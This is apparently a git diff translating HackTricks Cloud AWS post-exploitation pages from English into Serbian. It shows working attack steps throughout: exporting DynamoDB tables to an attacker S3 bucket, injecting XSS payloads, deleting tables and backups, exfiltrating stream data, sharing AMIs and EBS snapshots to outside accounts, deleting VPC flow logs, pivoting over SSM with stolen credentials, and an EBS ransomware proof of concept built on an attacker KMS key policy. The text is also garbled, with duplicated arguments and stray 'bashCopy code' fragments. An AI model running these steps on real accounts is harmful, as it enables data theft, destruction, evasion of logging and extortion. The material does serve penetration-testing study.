--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
--table-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable \
--s3-bucket <attacker_s3_bucket> \
--s3-prefix <optional_prefix> \
--export-time <point_in_time> \
--region <region>
```
Note that for this to work the table needs to have point-in-time-recovery enabled, you can check if the table has it with:
Napomena da za ovo da bi radilo, tabela treba da ima omogućenu point-in-time-recovery, možete proveriti da li tabela to ima sa:
```bash
aws dynamodb describe-continuous-backups \
--table-name <tablename>
--table-name <tablename>
```
If it isn't enabled, you will need to **enable it** and for that you need the **`dynamodb:ExportTableToPointInTime`** permission:
Ako nije omogućeno, moraćete da **omogućite** to, a za to vam je potrebna **`dynamodb:ExportTableToPointInTime`** dozvola:
```bash
aws dynamodb update-continuous-backups \
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
--table-name <value> \
--point-in-time-recovery-specification PointInTimeRecoveryEnabled=true
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table
**Potencijalni uticaj:** Indirektni privesc lociranjem osetljivih informacija u tabeli
### `dynamodb:CreateTable`, `dynamodb:RestoreTableFromBackup`, (`dynamodb:CreateBackup)`
With these permissions, an attacker would be able to **create a new table from a backup** (or even create a backup to then restore it in a different table). Then, with the necessary permissions, he would be able to check **information** from the backups that c**ould not be any more in the production** table.
Sa ovim dozvolama, napadač bi mogao da **napravi novu tabelu iz rezervne kopije** (ili čak da napravi rezervnu kopiju koju bi zatim obnovio u drugoj tabeli). Zatim, sa potrebnim dozvolama, mogao bi da proveri **informacije** iz rezervnih kopija koje **više ne bi mogle biti u produkcijskoj** tabeli.
```bash
aws dynamodb restore-table-from-backup \
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
--backup-arn <source-backup-arn> \
--target-table-name <new-table-name> \
--region <region>
```
**Potential Impact:** Indirect privesc by locating sensitive information in the table backup
**Potencijalni uticaj:** Indirektno privesc lociranjem osetljivih informacija u rezervnoj kopiji tabele
### `dynamodb:PutItem`
This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**.
Ova dozvola omogućava korisnicima da dodaju **novi predmet u tabelu ili zamene postojeći predmet** novim predmetom. Ako predmet sa istim primarnim ključem već postoji, **ceo predmet će biti zamenjen** novim predmetom. Ako primarni ključ ne postoji, novi predmet sa navedenim primarnim ključem će biti **kreiran**.
{{#tabs }}
{{#tab name="XSS Example" }}
```bash
## Create new item with XSS payload
aws dynamodb put-item --table <table_name> --item file://add.json
### With add.json:
{
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
"Id": {
"S": "1000"
},
"Name": {
"S": "Marc"
},
"Description": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
{{#tab name="AI Primer" }}
```bash
aws dynamodb put-item \
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
--table-name ExampleTable \
--item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Potencijalni uticaj:** Eksploatacija daljih ranjivosti/zaobilaženja omogućavanjem dodavanja/modifikacije podataka u DynamoDB tabeli
### `dynamodb:UpdateItem`
This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression.
Ova dozvola omogućava korisnicima da **modifikuju postojeće atribute stavke ili dodaju nove atribute stavci**. Ona **ne zamenjuje** celu stavku; samo ažurira specificirane atribute. Ako primarni ključ ne postoji u tabeli, operacija će **napraviti novu stavku** sa specificiranim primarnim ključem i postaviti atribute navedene u izrazu za ažuriranje.
{{#tabs }}
{{#tab name="XSS Example" }}
```bash
## Update item with XSS payload
aws dynamodb update-item --table <table_name> \
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
--key file://key.json --update-expression "SET Description = :value" \
--expression-attribute-values file://val.json
### With key.json:
{
"Id": {
"S": "1000"
}
"Id": {
"S": "1000"
}
}
### and val.json
{
":value": {
"S": "<script>alert(1)</script>"
}
":value": {
"S": "<script>alert(1)</script>"
}
}
```
{{#endtab }}
{{#tab name="AI Example" }}
{{#tab name="AI Primer" }}
```bash
aws dynamodb update-item \
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
--table-name ExampleTable \
--key '{"Id": {"S": "1"}}' \
--update-expression "SET Attribute1 = :val1, Attribute2 = :val2" \
--expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \
--region <region>
```
{{#endtab }}
{{#endtabs }}
**Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table
**Potencijalni uticaj:** Iskorišćavanje daljih ranjivosti/zaobilaženja omogućavanjem dodavanja/modifikacije podataka u DynamoDB tabeli
### `dynamodb:DeleteTable`
An attacker with this permission can **delete a DynamoDB table, causing data loss**.
Napadač sa ovom dozvolom može **izbrisati DynamoDB tabelu, uzrokujući gubitak podataka**.
```bash
aws dynamodb delete-table \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
**Potential impact**: Data loss and disruption of services relying on the deleted table.
**Potencijalni uticaj**: Gubitak podataka i prekid usluga koje se oslanjaju na obrisanu tabelu.
### `dynamodb:DeleteBackup`
An attacker with this permission can **delete a DynamoDB backup, potentially causing data loss in case of a disaster recovery scenario**.
Napadač sa ovom dozvolom može **obrisati DynamoDB rezervnu kopiju, potencijalno uzrokujući gubitak podataka u slučaju scenarija oporavka od katastrofe**.
```bash
aws dynamodb delete-backup \
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
--backup-arn arn:aws:dynamodb:<region>:<account-id>:table/TargetTable/backup/BACKUP_ID \
--region <region>
```
**Potential impact**: Data loss and inability to recover from a backup during a disaster recovery scenario.
**Potencijalni uticaj**: Gubitak podataka i nemogućnost oporavka iz rezervne kopije tokom scenarija oporavka od katastrofe.
### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords`
> [!NOTE]
> TODO: Test if this actually works
> TODO: Testirati da li ovo zapravo funkcioniše
An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage.
1. Enable a stream on a DynamoDB table:
Napadač sa ovim dozvolama može **omogućiti stream na DynamoDB tabeli, ažurirati tabelu da započne strimovanje promena, a zatim pristupiti streamu kako bi pratio promene na tabeli u realnom vremenu**. Ovo omogućava napadaču da prati i exfiltrira promene podataka, što može dovesti do curenja podataka.
1. Omogućiti stream na DynamoDB tabeli:
```bash
bashCopy codeaws dynamodb update-table \
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
--table-name TargetTable \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES \
--region <region>
```
2. Describe the stream to obtain the ARN and other details:
2. Opišite tok za dobijanje ARN-a i drugih detalja:
```bash
bashCopy codeaws dynamodb describe-stream \
--table-name TargetTable \
--region <region>
--table-name TargetTable \
--region <region>
```
3. Get the shard iterator using the stream ARN:
3. Dobijte shard iterator koristeći stream ARN:
```bash
bashCopy codeaws dynamodbstreams get-shard-iterator \
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
--stream-arn <stream_arn> \
--shard-id <shard_id> \
--shard-iterator-type LATEST \
--region <region>
```
4. Use the shard iterator to access and exfiltrate data from the stream:
4. Koristite shard iterator za pristup i eksfiltraciju podataka iz struje:
```bash
bashCopy codeaws dynamodbstreams get-records \
--shard-iterator <shard_iterator> \
--region <region>
--shard-iterator <shard_iterator> \
--region <region>
```
**Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes.
**Potencijalni uticaj**: Praćenje u realnom vremenu i curenje podataka o promenama u DynamoDB tabeli.
{{#include ../../../banners/hacktricks-training.md}}

581
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md
View File

@@ -4,7 +4,7 @@
## EC2 & VPC
For more information check:
Za više informacija pogledajte:
{{#ref}}
../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,10 +12,10 @@ For more information check:
### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`
VPC traffic mirroring **duplicates inbound and outbound traffic for EC2 instances within a VPC** without the need to install anything on the instances themselves. This duplicated traffic would commonly be sent to something like a network intrusion detection system (IDS) for analysis and monitoring.\
An attacker could abuse this to capture all the traffic and obtain sensitive information from it:
VPC traffic mirroring **duplira ulazni i izlazni saobraćaj za EC2 instance unutar VPC** bez potrebe za instaliranjem bilo čega na samim instancama. Ovaj duplirani saobraćaj bi obično bio poslat nečemu poput sistema za detekciju mrežnih upada (IDS) radi analize i nadgledanja.\
Napadač bi mogao da iskoristi ovo da uhvati sav saobraćaj i dobije osetljive informacije iz njega:
For more information check this page:
Za više informacija pogledajte ovu stranicu:
{{#ref}}
aws-malicious-vpc-mirror.md
@@ -23,8 +23,7 @@ aws-malicious-vpc-mirror.md
### Copy Running Instance
Instances usually contain some kind of sensitive information. There are different ways to get inside (check [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). However, another way to check what it contains is to **create an AMI and run a new instance (even in your own account) from it**:
Instance obično sadrže neku vrstu osetljivih informacija. Postoje različiti načini da se uđe unutra (proverite [EC2 privilege escalation tricks](../../aws-privilege-escalation/aws-ec2-privesc.md)). Međutim, drugi način da se proveri šta sadrži je da se **napravi AMI i pokrene nova instanca (čak i na vašem vlastitom nalogu) iz nje**:
```shell
# List instances
aws ec2 describe-images
@@ -48,11 +47,10 @@ aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
```
### EBS Snapshot dump
**Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\
If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account:
**Snapshot-i su rezervne kopije volumena**, koje obično sadrže **osetljive informacije**, stoga njihovo proveravanje treba da otkrije ove informacije.\
Ako pronađete **volumen bez snapshot-a**, možete: **Kreirati snapshot** i izvršiti sledeće radnje ili jednostavno **montirati ga u instancu** unutar naloga:
{{#ref}}
aws-ebs-snapshot-dump.md
@@ -62,197 +60,178 @@ aws-ebs-snapshot-dump.md
#### DNS Exfiltration
Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**.
Čak i ako zaključate EC2 tako da nijedan saobraćaj ne može da izađe, još uvek može **da exfiltrira putem DNS-a**.
- **VPC Flow Logs will not record this**.
- You have no access to AWS DNS logs.
- Disable this by setting "enableDnsSupport" to false with:
- **VPC Flow Logs neće ovo zabeležiti**.
- Nemate pristup AWS DNS logovima.
- Onemogućite ovo postavljanjem "enableDnsSupport" na false sa:
`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>`
`aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>`
#### Exfiltration via API calls
An attacker could call API endpoints of an account controlled by him. Cloudtrail will log this calls and the attacker will be able to see the exfiltrate data in the Cloudtrail logs.
Napadač bi mogao da pozove API krajnje tačke naloga koji kontroliše. Cloudtrail će zabeležiti ove pozive i napadač će moći da vidi exfiltrirane podatke u Cloudtrail logovima.
### Open Security Group
You could get further access to network services by opening ports like this:
Možete dobiti dalji pristup mrežnim uslugama otvaranjem portova na sledeći način:
```bash
aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC
```
### Privesc to ECS
It's possible to run an EC2 instance an register it to be used to run ECS instances and then steal the ECS instances data.
Moguće je pokrenuti EC2 instancu i registrovati je za korišćenje u pokretanju ECS instanci, a zatim ukrasti podatke iz ECS instanci.
For [**more information check this**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
### Remove VPC flow logs
Za [**više informacija proverite ovo**](../../aws-privilege-escalation/aws-ec2-privesc.md#privesc-to-ecs).
### Ukloni VPC tok logove
```bash
aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>
```
### SSM Port Forwarding
Required permissions:
- `ssm:StartSession`
In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs.
One of the scenarios where this is useful is pivoting from a [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) to a private EKS cluster.
Pored izvršavanja komandi, SSM omogućava tunelovanje saobraćaja što se može zloupotrebiti za preusmeravanje sa EC2 instanci koje nemaju mrežni pristup zbog Security Groups ili NACLs. Jedan od scenarija gde je ovo korisno je preusmeravanje sa [Bastion Host](https://www.geeksforgeeks.org/what-is-aws-bastion-host/) na privatni EKS klaster.
> In order to start a session you need the SessionManagerPlugin installed: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
1. Install the SessionManagerPlugin on your machine
2. Log in to the Bastion EC2 using the following command:
> Da biste započeli sesiju, potrebno je da imate instaliran SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html
1. Instalirajte SessionManagerPlugin na vašem računaru
2. Prijavite se na Bastion EC2 koristeći sledeću komandu:
```shell
aws ssm start-session --target "$INSTANCE_ID"
```
3. Get the Bastion EC2 AWS temporary credentials with the [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) script
4. Transfer the credentials to your own machine in the `$HOME/.aws/credentials` file as `[bastion-ec2]` profile
5. Log in to EKS as the Bastion EC2:
3. Dobijte privremene akreditive za Bastion EC2 AWS pomoću [Abusing SSRF in AWS EC2 environment](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#abusing-ssrf-in-aws-ec2-environment) skripte
4. Prenesite akreditive na svoju mašinu u `$HOME/.aws/credentials` datoteci kao `[bastion-ec2]` profil
5. Prijavite se na EKS kao Bastion EC2:
```shell
aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>
```
6. Update the `server` field in `$HOME/.kube/config` file to point to `https://localhost`
7. Create an SSM tunnel as follows:
6. Ažurirajte polje `server` u datoteci `$HOME/.kube/config` da pokazuje na `https://localhost`
7. Kreirajte SSM tunel na sledeći način:
```shell
sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>
```
8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running:
8. Saobraćaj iz `kubectl` alata se sada prosleđuje kroz SSM tunel putem Bastion EC2 i možete pristupiti privatnom EKS klasteru sa svog računara pokretanjem:
```shell
kubectl get pods --insecure-skip-tls-verify
```
Napomena da će SSL veze propasti osim ako ne postavite `--insecure-skip-tls-verify` flag (ili njegov ekvivalent u K8s audit alatima). S obzirom na to da je saobraćaj tunelovan kroz sigurni AWS SSM tunel, sigurni ste od bilo kakvih MitM napada.
Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks.
Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application.
Na kraju, ova tehnika nije specifična za napad na privatne EKS klastere. Možete postaviti proizvoljne domene i portove da se prebacite na bilo koju drugu AWS uslugu ili prilagođenu aplikaciju.
### Share AMI
```bash
aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
```
### Pretraživanje osetljivih informacija u javnim i privatnim AMI-ima
### Search sensitive information in public and private AMIs
- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data.
### Share EBS Snapshot
- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel je alat dizajniran za **pretraživanje osetljivih informacija unutar javnih ili privatnih Amazon Machine Images (AMIs)**. Automatizuje proces pokretanja instanci iz ciljanih AMI-a, montiranja njihovih volumena i skeniranja za potencijalne tajne ili osetljive podatke.
### Podeli EBS Snapshot
```bash
aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>
```
### EBS Ransomware PoC
A proof of concept similar to the Ransomware demonstration demonstrated in the S3 post-exploitation notes. KMS should be renamed to RMS for Ransomware Management Service with how easy it is to use to encrypt various AWS services using it.
First from an 'attacker' AWS account, create a customer managed key in KMS. For this example we'll just have AWS manage the key data for me, but in a realistic scenario a malicious actor would retain the key data outside of AWS' control. Change the key policy to allow for any AWS account Principal to use the key. For this key policy, the account's name was 'AttackSim' and the policy rule allowing all access is called 'Outside Encryption'
Dokaz koncepta sličan demonstraciji Ransomware prikazanoj u beleškama o post-ekspolataciji S3. KMS bi trebalo preimenovati u RMS za Ransomware Management Service s obzirom na to koliko je lako koristiti ga za enkripciju raznih AWS usluga.
Prvo, iz 'napadačkog' AWS naloga, kreirajte ključ koji korisnik upravlja u KMS-u. Za ovaj primer ćemo samo dozvoliti AWS-u da upravlja podacima o ključu za mene, ali u realističnom scenariju, zlonamerna osoba bi zadržala podatke o ključu van AWS-ove kontrole. Promenite politiku ključa da dozvoli bilo kojem AWS nalogu Principal da koristi ključ. Za ovu politiku ključa, ime naloga je bilo 'AttackSim', a pravilo politike koje omogućava sve pristupe se zove 'Outside Encryption'
```
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}
```
The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:
Pravila politike ključa treba da imaju omogućene sledeće stavke kako bi se omogućila upotreba za enkripciju EBS volumena:
- `kms:CreateGrant`
- `kms:Decrypt`
@@ -260,222 +239,214 @@ The key policy rule needs the following enabled to allow for the ability to use
- `kms:GenerateDataKeyWithoutPlainText`
- `kms:ReEncrypt`
Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.
Sada sa javno dostupnim ključem za korišćenje. Možemo koristiti 'žrtvinu' račun koja ima nekoliko EC2 instanci pokrenutih sa neenkriptovanim EBS volumenima. Ovi EBS volumeni 'žrtvinske' računa su ono što cilјamo za enkripciju, ovaj napad se pretpostavlja da je izvršen na računu sa visokim privilegijama AWS.
![Pasted image 20231231172655](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/5b9a96cd-6006-4965-84a4-b090456f90c6) ![Pasted image 20231231172734](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4294289c-0dbd-4eb6-a484-60b4e4266459)
Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the 'attacker' account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
Slično primeru S3 ransomware-a. Ovaj napad će kreirati kopije povezanih EBS volumena koristeći snimke, koristiti javno dostupni ključ iz 'napadačke' računa za enkripciju novih EBS volumena, zatim odvojiti originalne EBS volumene od EC2 instanci i obrisati ih, a zatim konačno obrisati snimke korišćene za kreiranje novokreiranih enkriptovanih EBS volumena. ![Pasted image 20231231173130](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/34808990-2b3b-4975-a523-8ee45874279e)
This results in only encrypted EBS volumes left available in the account.
To rezultira time da su u računu ostali samo enkriptovani EBS volumeni.
![Pasted image 20231231173338](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/eccdda58-f4b1-44ea-9719-43afef9a8220)
Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.
Takođe je važno napomenuti da je skripta zaustavila EC2 instance kako bi odvojila i obrisala originalne EBS volumene. Originalni neenkriptovani volumeni su sada nestali.
![Pasted image 20231231173931](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/cc31a5c9-fbb4-4804-ac87-911191bb230e)
Next, return to the key policy in the 'attacker' account and remove the 'Outside Encryption' policy rule from the key policy.
Sledeće, vratite se na politiku ključa u 'napadačkom' računu i uklonite pravilo politike 'Vanjska enkripcija' iz politike ključa.
```json
{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}
```
Wait a moment for the newly set key policy to propagate. Then return to the 'victim' account and attempt to attach one of the newly encrypted EBS volumes. You'll find that you can attach the volume.
Sačekajte trenutak da se nova politika ključeva propagira. Zatim se vratite na 'žrtvovani' nalog i pokušajte da priključite jedan od novokodiranih EBS volumena. Otkrivaćete da možete da priključite volumen.
![Pasted image 20231231174131](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/ba9e5340-7020-4af9-95cc-0e02267ced47) ![Pasted image 20231231174258](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/6c3215ec-4161-44e2-b1c1-e32f43ad0fa4)
But when you attempt to actually start the EC2 instance back up with the encrypted EBS volume it'll just fail and go from the 'pending' state back to the 'stopped' state forever since the attached EBS volume can't be decrypted using the key since the key policy no longer allows it.
Ali kada pokušate da zapravo pokrenete EC2 instancu sa kodiranim EBS volumenom, jednostavno će propasti i preći iz 'pending' stanja nazad u 'stopped' stanje zauvek, pošto se priključen EBS volumen ne može dekriptovati koristeći ključ, jer politika ključeva više to ne dozvoljava.
![Pasted image 20231231174322](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/73456c22-0828-4da9-a737-e4d90fa3f514) ![Pasted image 20231231174352](https://github.com/DialMforMukduk/hacktricks-cloud/assets/35155877/4d83a90e-6fa9-4003-b904-a4ba7f5944d0)
